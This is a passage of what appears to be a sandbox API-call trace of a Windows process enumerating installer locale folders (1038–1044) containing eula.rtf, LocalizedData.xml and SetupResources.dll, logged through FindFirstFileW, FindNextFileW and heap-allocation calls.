ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.841] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.841] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0045.842] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.842] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260608 [0045.842] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.842] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.842] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.842] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.842] FindNextFileW (in: hFindFile=0x4260608, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.842] FindClose (in: hFindFile=0x4260608 | out: hFindFile=0x4260608) returned 1 [0045.842] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.842] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0045.842] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.843] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260488 [0045.846] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.846] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.846] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.847] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.847] FindNextFileW (in: hFindFile=0x4260488, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.847] FindClose (in: hFindFile=0x4260488 | out: hFindFile=0x4260488) returned 1 [0045.848] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.848] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0045.848] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.848] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42607c8 [0045.849] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.849] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.849] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.849] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.849] FindNextFileW (in: hFindFile=0x42607c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.849] FindClose (in: hFindFile=0x42607c8 | out: hFindFile=0x42607c8) returned 1 [0045.850] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0045.850] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.850] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.850] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.850] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.851] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.851] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.851] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.851] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.852] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.852] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0045.853] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.853] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260748 [0045.853] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.853] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.853] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.853] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.853] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.853] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0045.853] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.853] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0045.853] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.853] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42601c8 [0045.854] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.854] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.854] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.854] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.855] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.855] FindClose (in: hFindFile=0x42601c8 | out: hFindFile=0x42601c8) returned 1 [0045.855] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.855] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, 